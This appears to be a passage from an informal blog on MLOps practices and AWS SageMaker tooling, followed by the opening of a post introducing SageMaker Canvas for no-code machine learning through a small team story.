Continuous Delivery (CD): extending the service packaging and adding an ML training pipeline that should automatically deploy another service called model prediction service.
Continuous Training (CT): automatically retrains ML models for re-deployment (unique to ML systems property).put in mind that re-training triggers happen for reasons and are not 100% automatic and in many cases need a human in the loop for the decision of such triggers so it case-based approach but you must have a ready training pipeline with triggers
Continuous Monitoring (CM) monitoring production data and model performance in terms of business metrics.

some goals we want to or try to achieve when applying MLops

1- team collaboration and ease of tracking and re-producing for (code, data, models)
2- easy to share preprocessed data across teams, projects, or even moving between data channels like test and train
3- good visibility and motioning in all the way (from data to serving to even feedbacks from the end client of the final software )
4- easy to make decisions or triggering for any part such as triggering re-training, processing

tools and tech to achive some or all of the above goals

1- feature store: here it will take care of automating some of Ali work ( preprocessing and feature engineering )
single source of truth to store, retrieve, remove, track, share, discover, and control access to features.
and you can use aws sagemaker feature store for that

2- experiment tracking and model registry: this will help jack in his experiments and will help mamon in reaching models while pushing to production, and here we can use aws sagemaker model registry

3- training pipeline: no need for jack to re-execute the training phase if a model decay happen a Trigger can start re-training using the training pipeline defined by jack, you can use aws sagemaker pipeline, also you can use AWS lambda, you can use TFX, TorchX , kubeflow

4- serving pipeline: base of production strategy this pipeline can help mamon from checking which model to validate and to re-package and redeploy the serving services, aws sagemaker pipeline, also you can use aws lambda, you can use TFX , TorchX, kubeflow

4- data and model monitoring for drifting and decay with triggers: here we can use aws sagemaker pipeline with model monitoring

5- when we talk about pipeline we need orchestration and also we need automation aws sagemaker pipeline will manage that for you behind the scenes

how we we can achieve all of the above in AWS a quick video

No code ML with Amazon SageMaker Canvas

almamon rasool abdali — Wed, 01 Dec 2021 10:50:06 +0000

No code ML is an approach to build an ml based models without doing any heavy data work or ml coding .

No code ML platforms designed for business users or analysts with the domain knowledge of the overall workflow but thus business users have less or no coding experience.

AWS SageMaker Canvas is No code ML platform.

before you go to AWS SageMaker Canvas .. you must make sure you know at high level how the ML workflow looks likes

there is 4 main phases :
phase-1 : gathering , ingestion , extraction of data

phase-2 : data exploring , understanding , cleaning , transforming and pre-processing ( why i put thus in one phase its coz the more you understand the data the better you can pre-process it and feature engineer it )

phase-3 : modeling ( training and validation )

phase-4 : serving and monitoring

according to above let see simple ML project story

a simple ML project story you team (jason is data eng , ali is data scientist , jack is ml researcher , mamon is ml engineer )
jason setup data pipeline that start by collecting and storing and organizing cataloging the data and make it ready for consuming by others, ali gathered some data from data from sources that jason already maintain , and now ali explored data and you clean it and make some preprocessing and feature engineering on the data and delivered it to jack.

jack started to split data and do modeling and training and benchmarking now jack deliver a trained model with it artifact to mamon.

mamon validate the model build the serving service and push the model to production.

now imagine that with AWS SageMaker Canvas you can do (ali , jack ) work with simple clicks and no deep coding knowledge.

let see how